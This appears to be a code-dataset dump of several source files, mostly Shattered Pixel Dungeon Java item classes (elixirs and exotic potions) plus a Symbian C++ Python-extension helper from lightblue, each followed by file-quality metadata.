@Override
public int price() {
//prices of ingredients
return quantity * (50 + 40);
}
public static class Recipe extends com.shatteredpixel.shatteredpixeldungeon.items.Recipe.SimpleRecipe {
{
inputs = new Class[]{PotionOfSnapFreeze.class, AlchemicalCatalyst.class};
inQuantity = new int[]{1, 1};
cost = 6;
output = ElixirOfIcyTouch.class;
outQuantity = 1;
}
}
}
| 2,144 | ElixirOfIcyTouch | java | en | java | code | {"qsc_code_num_words": 256, "qsc_code_num_chars": 2144.0, "qsc_code_mean_word_length": 6.40234375, "qsc_code_frac_words_unique": 0.546875, "qsc_code_frac_chars_top_2grams": 0.0933496, "qsc_code_frac_chars_top_3grams": 0.20866382, "qsc_code_frac_chars_top_4grams": 0.18791946, "qsc_code_frac_chars_dupe_5grams": 0.24649176, "qsc_code_frac_chars_dupe_6grams": 0.16961562, "qsc_code_frac_chars_dupe_7grams": 0.0, "qsc_code_frac_chars_dupe_8grams": 0.0, "qsc_code_frac_chars_dupe_9grams": 0.0, "qsc_code_frac_chars_dupe_10grams": 0.0, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.01703297, "qsc_code_frac_chars_whitespace": 0.1511194, "qsc_code_size_file_byte": 2144.0, "qsc_code_num_lines": 69.0, "qsc_code_num_chars_line_max": 105.0, "qsc_code_num_chars_line_mean": 31.07246377, "qsc_code_frac_chars_alphabet": 0.88351648, "qsc_code_frac_chars_comments": 0.38432836, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.08571429, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.0, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.00757576, "qsc_code_frac_lines_prompt_comments": 0.01449275, "qsc_code_frac_lines_assert": 0.0, "qsc_codejava_cate_var_zero": 1.0, "qsc_codejava_frac_lines_func_ratio": 0.08571429, "qsc_codejava_score_lines_no_logic": 0.34285714, "qsc_codejava_frac_words_no_modifier": 0.75, "qsc_codejava_frac_words_legal_var_name": null, "qsc_codejava_frac_words_legal_func_name": 1.0, "qsc_codejava_frac_words_legal_class_name": 1.0, "qsc_codejava_frac_lines_print": 0.0} | 0 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 1, "qsc_code_frac_chars_top_4grams": 1, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 1, "qsc_code_frac_lines_assert": 0, "qsc_codejava_cate_var_zero": 1, "qsc_codejava_frac_lines_func_ratio": 0, "qsc_codejava_score_lines_no_logic": 0, "qsc_codejava_frac_lines_print": 0} |
00-Evan/shattered-pixel-dungeon-gdx | core/src/com/shatteredpixel/shatteredpixeldungeon/items/potions/elixirs/ElixirOfDragonsBlood.java | /*
* Pixel Dungeon
* Copyright (C) 2012-2015 Oleg Dolya
*
* Shattered Pixel Dungeon
* Copyright (C) 2014-2019 Evan Debenham
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>
*/
package com.shatteredpixel.shatteredpixeldungeon.items.potions.elixirs;
import com.shatteredpixel.shatteredpixeldungeon.Assets;
import com.shatteredpixel.shatteredpixeldungeon.actors.buffs.Buff;
import com.shatteredpixel.shatteredpixeldungeon.actors.buffs.FireImbue;
import com.shatteredpixel.shatteredpixeldungeon.actors.hero.Hero;
import com.shatteredpixel.shatteredpixeldungeon.effects.particles.FlameParticle;
import com.shatteredpixel.shatteredpixeldungeon.items.potions.AlchemicalCatalyst;
import com.shatteredpixel.shatteredpixeldungeon.items.potions.exotic.PotionOfDragonsBreath;
import com.shatteredpixel.shatteredpixeldungeon.sprites.ItemSpriteSheet;
import com.watabou.noosa.audio.Sample;
public class ElixirOfDragonsBlood extends Elixir {
{
//TODO finish visuals
image = ItemSpriteSheet.ELIXIR_DRAGON;
}
@Override
public void apply(Hero hero) {
Buff.affect(hero, FireImbue.class).set(FireImbue.DURATION);
Sample.INSTANCE.play( Assets.SND_BURNING );
hero.sprite.emitter().burst(FlameParticle.FACTORY, 10);
}
@Override
protected int splashColor() {
return 0xFFFF002A;
}
@Override
public int price() {
//prices of ingredients
return quantity * (50 + 40);
}
public static class Recipe extends com.shatteredpixel.shatteredpixeldungeon.items.Recipe.SimpleRecipe {
{
inputs = new Class[]{PotionOfDragonsBreath.class, AlchemicalCatalyst.class};
inQuantity = new int[]{1, 1};
cost = 6;
output = ElixirOfDragonsBlood.class;
outQuantity = 1;
}
}
}
| 2,306 | ElixirOfDragonsBlood | java | en | java | code | {"qsc_code_num_words": 274, "qsc_code_num_chars": 2306.0, "qsc_code_mean_word_length": 6.47810219, "qsc_code_frac_words_unique": 0.54744526, "qsc_code_frac_chars_top_2grams": 0.09577465, "qsc_code_frac_chars_top_3grams": 0.21408451, "qsc_code_frac_chars_top_4grams": 0.19830986, "qsc_code_frac_chars_dupe_5grams": 0.22760563, "qsc_code_frac_chars_dupe_6grams": 0.15661972, "qsc_code_frac_chars_dupe_7grams": 0.0, "qsc_code_frac_chars_dupe_8grams": 0.0, "qsc_code_frac_chars_dupe_9grams": 0.0, "qsc_code_frac_chars_dupe_10grams": 0.0, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.01570415, "qsc_code_frac_chars_whitespace": 0.14397225, "qsc_code_size_file_byte": 2306.0, "qsc_code_num_lines": 72.0, "qsc_code_num_chars_line_max": 105.0, "qsc_code_num_chars_line_mean": 32.02777778, "qsc_code_frac_chars_alphabet": 0.88348531, "qsc_code_frac_chars_comments": 0.35732871, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.07894737, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.0, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.00674764, "qsc_code_frac_lines_prompt_comments": 0.01388889, "qsc_code_frac_lines_assert": 0.0, "qsc_codejava_cate_var_zero": 1.0, "qsc_codejava_frac_lines_func_ratio": 0.07894737, "qsc_codejava_score_lines_no_logic": 0.36842105, "qsc_codejava_frac_words_no_modifier": 0.75, "qsc_codejava_frac_words_legal_var_name": null, "qsc_codejava_frac_words_legal_func_name": 1.0, "qsc_codejava_frac_words_legal_class_name": 1.0, "qsc_codejava_frac_lines_print": 0.0} | 0 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 1, "qsc_code_frac_chars_top_4grams": 1, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 1, "qsc_code_frac_lines_assert": 0, "qsc_codejava_cate_var_zero": 1, "qsc_codejava_frac_lines_func_ratio": 0, "qsc_codejava_score_lines_no_logic": 0, "qsc_codejava_frac_lines_print": 0} |
0-1-0/lightblue-0.4 | src/series60/_lightblueutil/localepocpyutils.cpp | // -*- symbian-c++ -*-
//
// localepocpyutils.cpp
//
// Copyright 2004 Helsinki Institute for Information Technology (HIIT)
// and the authors. All rights reserved.
//
// Authors: Tero Hasu <tero.hasu@hut.fi>
//
// Utilities to assist in the creation of native Python extensions.
//
// Permission is hereby granted, free of charge, to any person
// obtaining a copy of this software and associated documentation files
// (the "Software"), to deal in the Software without restriction,
// including without limitation the rights to use, copy, modify, merge,
// publish, distribute, sublicense, and/or sell copies of the Software,
// and to permit persons to whom the Software is furnished to do so,
// subject to the following conditions:
//
// The above copyright notice and this permission notice shall be
// included in all copies or substantial portions of the Software.
//
// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
// EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
// MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
// NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
// BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
// ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
// CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
// SOFTWARE.
#include "localepocpyutils.h"
TInt ConstructType(const PyTypeObject* aTypeTemplate,
char* aClassName)
{
//// construct the type;
//// sets object refcount to 1
PyTypeObject* typeObj = PyObject_New(PyTypeObject, &PyType_Type);
*typeObj = *aTypeTemplate; // fill in from a template
typeObj->ob_type = &PyType_Type; // fill in the missing bit
//// store a reference to the type, for our own use
TInt error = SPyAddGlobalString(aClassName, (PyObject*)typeObj);
if (error < 0)
{
// the error codes for the above are not documented,
// but have seen the code, and believe return -1 on failure
return error;
}
//// a "global" hash now has a reference, too
Py_INCREF(typeObj);
return KErrNone;
}
| 2,086 | localepocpyutils | cpp | en | cpp | code | {"qsc_code_num_words": 294, "qsc_code_num_chars": 2086.0, "qsc_code_mean_word_length": 5.19727891, "qsc_code_frac_words_unique": 0.55102041, "qsc_code_frac_chars_top_2grams": 0.05759162, "qsc_code_frac_chars_top_3grams": 0.01701571, "qsc_code_frac_chars_top_4grams": 0.0, "qsc_code_frac_chars_dupe_5grams": 0.0, "qsc_code_frac_chars_dupe_6grams": 0.0, "qsc_code_frac_chars_dupe_7grams": 0.0, "qsc_code_frac_chars_dupe_8grams": 0.0, "qsc_code_frac_chars_dupe_9grams": 0.0, "qsc_code_frac_chars_dupe_10grams": 0.0, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.00406032, "qsc_code_frac_chars_whitespace": 0.17353787, "qsc_code_size_file_byte": 2086.0, "qsc_code_num_lines": 57.0, "qsc_code_num_chars_line_max": 72.0, "qsc_code_num_chars_line_mean": 36.59649123, "qsc_code_frac_chars_alphabet": 0.88225058, "qsc_code_frac_chars_comments": 0.80680729, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.0, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.04466501, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codecpp_frac_lines_preprocessor_directives": 0.14285714, "qsc_codecpp_frac_lines_func_ratio": 0.07142857, "qsc_codecpp_cate_bitsstdc": 0.0, "qsc_codecpp_nums_lines_main": 0.0, "qsc_codecpp_frac_lines_goto": 0.0, "qsc_codecpp_cate_var_zero": 0.0, "qsc_codecpp_score_lines_no_logic": 0.28571429, "qsc_codecpp_frac_lines_print": 0.0} | 0 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 1, "qsc_code_cate_xml_start": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codecpp_frac_lines_func_ratio": 0, "qsc_codecpp_nums_lines_main": 0, "qsc_codecpp_score_lines_no_logic": 0, "qsc_codecpp_frac_lines_preprocessor_directives": 0, "qsc_codecpp_frac_lines_print": 0} |
00-Evan/shattered-pixel-dungeon-gdx | core/src/com/shatteredpixel/shatteredpixeldungeon/items/potions/exotic/PotionOfSnapFreeze.java | /*
* Pixel Dungeon
* Copyright (C) 2012-2015 Oleg Dolya
*
* Shattered Pixel Dungeon
* Copyright (C) 2014-2019 Evan Debenham
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>
*/
package com.shatteredpixel.shatteredpixeldungeon.items.potions.exotic;
import com.shatteredpixel.shatteredpixeldungeon.Assets;
import com.shatteredpixel.shatteredpixeldungeon.Dungeon;
import com.shatteredpixel.shatteredpixeldungeon.actors.Actor;
import com.shatteredpixel.shatteredpixeldungeon.actors.Char;
import com.shatteredpixel.shatteredpixeldungeon.actors.blobs.Fire;
import com.shatteredpixel.shatteredpixeldungeon.actors.blobs.Freezing;
import com.shatteredpixel.shatteredpixeldungeon.actors.buffs.Buff;
import com.shatteredpixel.shatteredpixeldungeon.actors.buffs.Roots;
import com.watabou.noosa.audio.Sample;
import com.watabou.utils.PathFinder;
public class PotionOfSnapFreeze extends ExoticPotion {
{
initials = 1;
}
@Override
public void shatter(int cell) {
if (Dungeon.level.heroFOV[cell]) {
setKnown();
splash( cell );
Sample.INSTANCE.play( Assets.SND_SHATTER );
}
Fire fire = (Fire)Dungeon.level.blobs.get( Fire.class );
for (int offset : PathFinder.NEIGHBOURS9){
if (!Dungeon.level.solid[cell+offset]) {
Freezing.affect( cell + offset, fire );
Char ch = Actor.findChar( cell + offset);
if (ch != null){
Buff.affect(ch, Roots.class, 10f);
}
}
}
}
}
| 2,034 | PotionOfSnapFreeze | java | en | java | code | {"qsc_code_num_words": 256, "qsc_code_num_chars": 2034.0, "qsc_code_mean_word_length": 5.90625, "qsc_code_frac_words_unique": 0.50390625, "qsc_code_frac_chars_top_2grams": 0.05952381, "qsc_code_frac_chars_top_3grams": 0.22619048, "qsc_code_frac_chars_top_4grams": 0.23280423, "qsc_code_frac_chars_dupe_5grams": 0.26587302, "qsc_code_frac_chars_dupe_6grams": 0.18253968, "qsc_code_frac_chars_dupe_7grams": 0.0, "qsc_code_frac_chars_dupe_8grams": 0.0, "qsc_code_frac_chars_dupe_9grams": 0.0, "qsc_code_frac_chars_dupe_10grams": 0.0, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.01233843, "qsc_code_frac_chars_whitespace": 0.16322517, "qsc_code_size_file_byte": 2034.0, "qsc_code_num_lines": 66.0, "qsc_code_num_chars_line_max": 72.0, "qsc_code_num_chars_line_mean": 30.81818182, "qsc_code_frac_chars_alphabet": 0.8760282, "qsc_code_frac_chars_comments": 0.38348083, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.0, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.0, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codejava_cate_var_zero": 0.0, "qsc_codejava_frac_lines_func_ratio": 0.02941176, "qsc_codejava_score_lines_no_logic": 0.35294118, "qsc_codejava_frac_words_no_modifier": 0.5, "qsc_codejava_frac_words_legal_var_name": 1.0, "qsc_codejava_frac_words_legal_func_name": 1.0, "qsc_codejava_frac_words_legal_class_name": 1.0, "qsc_codejava_frac_lines_print": 0.0} | 0 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 1, "qsc_code_frac_chars_top_4grams": 1, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codejava_cate_var_zero": 0, "qsc_codejava_frac_lines_func_ratio": 0, "qsc_codejava_score_lines_no_logic": 0, "qsc_codejava_frac_lines_print": 0} |
00-Evan/shattered-pixel-dungeon-gdx | core/src/com/shatteredpixel/shatteredpixeldungeon/items/potions/exotic/PotionOfStamina.java | /*
* Pixel Dungeon
* Copyright (C) 2012-2015 Oleg Dolya
*
* Shattered Pixel Dungeon
* Copyright (C) 2014-2019 Evan Debenham
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>
*/
package com.shatteredpixel.shatteredpixeldungeon.items.potions.exotic;
import com.shatteredpixel.shatteredpixeldungeon.actors.buffs.Buff;
import com.shatteredpixel.shatteredpixeldungeon.actors.buffs.Stamina;
import com.shatteredpixel.shatteredpixeldungeon.actors.hero.Hero;
public class PotionOfStamina extends ExoticPotion {
{
initials = 2;
}
@Override
public void apply(Hero hero) {
setKnown();
Buff.affect(hero, Stamina.class, 100f);
}
}
| 1,245 | PotionOfStamina | java | en | java | code | {"qsc_code_num_words": 169, "qsc_code_num_chars": 1245.0, "qsc_code_mean_word_length": 5.56804734, "qsc_code_frac_words_unique": 0.60946746, "qsc_code_frac_chars_top_2grams": 0.07226355, "qsc_code_frac_chars_top_3grams": 0.16153029, "qsc_code_frac_chars_top_4grams": 0.06057386, "qsc_code_frac_chars_dupe_5grams": 0.25717322, "qsc_code_frac_chars_dupe_6grams": 0.17640808, "qsc_code_frac_chars_dupe_7grams": 0.0, "qsc_code_frac_chars_dupe_8grams": 0.0, "qsc_code_frac_chars_dupe_9grams": 0.0, "qsc_code_frac_chars_dupe_10grams": 0.0, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.02027027, "qsc_code_frac_chars_whitespace": 0.16787149, "qsc_code_size_file_byte": 1245.0, "qsc_code_num_lines": 41.0, "qsc_code_num_chars_line_max": 72.0, "qsc_code_num_chars_line_mean": 30.36585366, "qsc_code_frac_chars_alphabet": 0.88803089, "qsc_code_frac_chars_comments": 0.62650602, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.0, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.0, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codejava_cate_var_zero": 1.0, "qsc_codejava_frac_lines_func_ratio": 0.07142857, "qsc_codejava_score_lines_no_logic": 0.35714286, "qsc_codejava_frac_words_no_modifier": 0.5, "qsc_codejava_frac_words_legal_var_name": null, "qsc_codejava_frac_words_legal_func_name": 1.0, "qsc_codejava_frac_words_legal_class_name": 1.0, "qsc_codejava_frac_lines_print": 0.0} | 0 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codejava_cate_var_zero": 1, "qsc_codejava_frac_lines_func_ratio": 0, "qsc_codejava_score_lines_no_logic": 0, "qsc_codejava_frac_lines_print": 0} |
00-Evan/shattered-pixel-dungeon-gdx | core/src/com/shatteredpixel/shatteredpixeldungeon/items/potions/exotic/PotionOfMagicalSight.java | /*
* Pixel Dungeon
* Copyright (C) 2012-2015 Oleg Dolya
*
* Shattered Pixel Dungeon
* Copyright (C) 2014-2019 Evan Debenham
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>
*/
package com.shatteredpixel.shatteredpixeldungeon.items.potions.exotic;
import com.shatteredpixel.shatteredpixeldungeon.Dungeon;
import com.shatteredpixel.shatteredpixeldungeon.actors.buffs.Buff;
import com.shatteredpixel.shatteredpixeldungeon.actors.buffs.MagicalSight;
import com.shatteredpixel.shatteredpixeldungeon.actors.hero.Hero;
public class PotionOfMagicalSight extends ExoticPotion {
{
initials = 7;
}
@Override
public void apply(Hero hero) {
setKnown();
Buff.affect(hero, MagicalSight.class, MagicalSight.DURATION);
Dungeon.observe();
}
}
| 1,355 | PotionOfMagicalSight | java | en | java | code | {"qsc_code_num_words": 177, "qsc_code_num_chars": 1355.0, "qsc_code_mean_word_length": 5.85875706, "qsc_code_frac_words_unique": 0.58757062, "qsc_code_frac_chars_top_2grams": 0.08196721, "qsc_code_frac_chars_top_3grams": 0.18322083, "qsc_code_frac_chars_top_4grams": 0.16972035, "qsc_code_frac_chars_dupe_5grams": 0.23336548, "qsc_code_frac_chars_dupe_6grams": 0.16007715, "qsc_code_frac_chars_dupe_7grams": 0.0, "qsc_code_frac_chars_dupe_8grams": 0.0, "qsc_code_frac_chars_dupe_9grams": 0.0, "qsc_code_frac_chars_dupe_10grams": 0.0, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.01577564, "qsc_code_frac_chars_whitespace": 0.15793358, "qsc_code_size_file_byte": 1355.0, "qsc_code_num_lines": 43.0, "qsc_code_num_chars_line_max": 75.0, "qsc_code_num_chars_line_mean": 31.51162791, "qsc_code_frac_chars_alphabet": 0.89307625, "qsc_code_frac_chars_comments": 0.57564576, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.0, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.0, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codejava_cate_var_zero": 1.0, "qsc_codejava_frac_lines_func_ratio": 0.0625, "qsc_codejava_score_lines_no_logic": 0.375, "qsc_codejava_frac_words_no_modifier": 0.5, "qsc_codejava_frac_words_legal_var_name": null, "qsc_codejava_frac_words_legal_func_name": 1.0, "qsc_codejava_frac_words_legal_class_name": 1.0, "qsc_codejava_frac_lines_print": 0.0} | 0 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 1, "qsc_code_frac_chars_top_4grams": 1, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codejava_cate_var_zero": 1, "qsc_codejava_frac_lines_func_ratio": 0, "qsc_codejava_score_lines_no_logic": 0, "qsc_codejava_frac_lines_print": 0} |
0-1-0/lightblue-0.4 | src/series60/_lightblueutil/settings.h | // -*- symbian-c++ -*-
//
// settings.h
//
// Copyright 2004 Helsinki Institute for Information Technology (HIIT)
// and the authors. All rights reserved.
//
// Authors: Tero Hasu <tero.hasu@hut.fi>
//
// Some compile-time settings for this library.
//
// Permission is hereby granted, free of charge, to any person
